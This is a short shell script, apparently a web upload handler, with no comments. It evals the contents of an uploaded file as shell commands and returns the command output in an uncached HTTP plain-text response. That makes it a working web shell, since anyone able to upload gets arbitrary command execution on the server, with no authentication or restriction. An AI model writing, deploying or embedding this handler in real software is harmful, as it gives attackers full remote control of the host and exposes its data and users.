#!/bin/sh
CMD=$(cat "$UPLOAD_FILENAME" | tr -d '\r')
{
  printf '%s\n' "$CMD"
  eval "$CMD" 2>&1
} > "$UPLOAD_FILENAME"
len=$(wc -c < "$UPLOAD_FILENAME")
printf 'Cache-Control: no-store\r\n'
printf 'Content-Type: text/plain; charset=utf-8\r\n'
printf 'Content-Length: %d\r\n\r\n' "$len"
cat "$UPLOAD_FILENAME"
